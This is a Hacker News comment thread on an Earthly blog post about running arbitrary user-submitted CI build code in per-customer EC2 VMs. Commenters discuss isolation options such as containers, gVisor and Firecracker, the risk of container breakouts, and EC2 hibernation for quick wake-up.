[HN Gopher] Remote Code Execution as a Service
       ___________________________________________________________________
        
       Remote Code Execution as a Service
        
       Author : dijit
       Score  : 43 points
       Date   : 2023-03-07 19:29 UTC (3 hours ago)
        
 (HTM) web link (earthly.dev)
 (TXT) w3m dump (earthly.dev)
        
       | rafark wrote:
       | Aren't servers remote execution services?
        
         | seanw444 wrote:
         | You mean a VPS? Yes. An HTTP server, no. At least not by
         | default / design.
        
       | rkeene2 wrote:
       | I also allow remote code execution, though interactively [0].
       | Though I'm not using any VMs or anything like that for isolation.
       | 
       | Note: All the interesting stuff is in /opt/appfs
       | 
       | [0] https://rkeene.dev/js-repl/?arg=bash
        
       | phphphphp wrote:
       | Perhaps a dumb question but container breakouts are a problem for
       | all sorts of services which have been addressed in different
       | ways. Since your goal is not to prevent container breakouts but
       | rather securely run third-party code, why did you choose to use
       | EC2 over something like ECS or Lambda or Google Cloud Run which
       | is already dealing with the security aspect on your behalf?
       | Virtual machines seem less secure and less convenient.
        
         | adamgordonbell wrote:
         | Good question. Our goal is not just to run arbitrary code but
         | to run it fast and cache rework. We are a CI service and speed
         | is important. Brandon may be able to jump in with why not
         | various options but it's hard to beat giving users powerful
         | cloud machines to run their builds on.
         | 
         | I myself did try to run buildkit in a Lambda as I think that
         | would be low cost option. But I found it you couldn't make gRPC
         | calls against a lambda and that is a hard requirement for us.
        
           | AlexCoventry wrote:
           | Are you concerned about AWS launching a competing service if
           | you get significant traction?
        
           | brandonschurman wrote:
           | Some of the reason we went with EC2 over something like ECS
           | is that we would need to run the container in privileged mode
           | for some of our features to work. We also considered options
           | like gVisor, but ultimately the EC2 route was a simple enough
           | implementation that made it easy to manage the user's cache
           | volumes, etc. We're also hoping to use Firecracker VMs in the
           | near future.
        
       | adamgordonbell wrote:
       | Thanks for sharing this. One of the authors here.
       | 
       | We built a service that executes arbitrary user-submitted code.
       | An RCE service. It's the thing you're not supposed to build, but
       | we had to do it.
       | 
       | Running arbitrary code means containers weren't a good fit (
       | container breakouts happen), so we are spinning up and down ec2
       | instances. This means we have actual infrastructure as code (i.e.
       | not just piles of terraform but go code running in a service that
       | spins up and down VMs based on API calls).
       | 
       | The service spins up and down EC2 instances based on user
       | requests and executes user-submitted build scripts inside them.
       | 
       | It's not the standard web service we were used to building, so we
       | thought we'd write it up and share it with anyone interested.
       | 
       | One cool thing we learned was how quickly you can Hibernate and
       | wake up x86 EC2 instances. That ended up being a game-changer for
       | us.
       | 
       | Corey and Brandon did the building, I'm mainly just the person
       | who wrote things down, but hopefully, people find this
       | interesting.
        
         | plicense wrote:
         | I would suggest also looking at
         | https://github.com/bazelbuild/remote-apis. Its essentially a
         | standard API for remote (any binary) execution as a service and
         | there are several reference implementations of it (Buildgrid,
         | BuildBarn, Google's own service etc).
         | 
         | And you can consider using gVisor to minimize container
         | breakouts to a great extent.
        
           | adamgordonbell wrote:
           | I'll checkout that remote-apis link.
           | 
           | gVisor was considered but so far it looks like the next
           | iteration with be using firecracker vms. Our backend is
           | buildkit and it can't run in gvisor containers without some
           | work.
        
         | xxpor wrote:
         | Did you consider using firecracker?
        
           | adamgordonbell wrote:
           | Yeah, we totally did and actually Corey has been playing
           | around with a POC for backing with firecracker. It's likely
           | the next revision of this will use firecracker.
           | 
           | So it wasn't so much disqualified as decided it wouldn't be
           | the v1 solution. We wanted to get something out and get
           | people on it and get feedback. So weren't afraid to spend
           | some more computer dollars to do so.
        
         | k__ wrote:
         | I had the impression that's what fly.io was doing.
         | 
         | Converting Docker images to run in VMs instead of containers.
        
           | slondr wrote:
           | Fly uses Firecracker like AWS Lambda, not full-fledged VMs
           | like EC2.
        
         | cptnntsoobv wrote:
         | > One cool thing we learned was how quickly you can Hibernate
         | and wake up x86 EC2 instances. That ended up being a game-
         | changer for us.
         | 
         | Could you talk more about it? Are you keeping a cache of
         | hibernated EC2 instances and re-launching them per request?
         | What sort of relaunch latency profile do you see as function of
         | instance memory size?
        
           | adamgordonbell wrote:
           | A specific Ec2 instance is always serving one customer max.
           | And builds are highly cachable, so the ec2 instance has an
           | EBS volume on it with a big cache that Earthly uses to
           | prevent rework.
           | 
           | That instance is just sitting around waiting for gRPC
           | requests that tell it to run another build. If it's idle for
           | 30 minutes, it hibernates and then if another call comes back
           | in a gRPC proxy wakes it back up.
           | 
           | I don't know if the wake up time increases per the size of
           | the cache in memory, I can check with Brandon but its much
           | faster starting up an instance cold, mainly because buildkit
           | is designed for throughput and not a quick startup.
           | 
           | There are more details in the blog.
        
         | iueotnmunto wrote:
         | While container breakouts do happen, they're pretty rare. I'd
         | be more concerned about any potential injection vectors in the
         | go code, which could lead to a cloud breach if you're not
         | careful ;)
        
           | adamgordonbell wrote:
           | Oh interesting. What were you imagining as the injection
           | vector?
           | 
           | The earthly backend runs on a modified buildkit so it is
           | running the arbitrary code in a container, but it's also in
           | its own VM. This was simpler then firecracker to get started
           | but turned out to have pretty good performance and alright
           | cost once we started suspending things.
        
             | iueotnmunto wrote:
             | More if you're running `provision --vm-name
             | "$UserSuppliedData"` or similar. I don't know how you've
             | built your wrapping tool, so I can't comment on how likely
             | it would be, but I've seen such breakages IRL (I break
             | things for a living ;) )
        
               | brandonschurman wrote:
               | Good point, we do have things locked down pretty well in
               | our go code though. The instances can only be provisioned
               | using an API, and that API doesn't allow for arbitrary
               | user-supplied input.
        
           | raesene9 wrote:
           | There have been a bunch of Linux kernel privesc vulns that
           | can be converted to container breakouts from standard Linux
           | containers, just look at bounties from Google's kCTF (AFAIK
           | they've had 10 different kernel vulns in 2 years)
           | 
           | It's possible to mitigate/reduce them for sure, with
           | appropriate hardening, but the Linux kernel is still quite a
           | big attack surface.
        
             | flangola7 wrote:
             | What about kernels like seL4? I think everyone will abandon
             | monolithic kernels one day because they have too much
             | attack surface.
        
             | [deleted]
        
         | [deleted]
        
       ___________________________________________________________________
       (page generated 2023-03-07 23:01 UTC)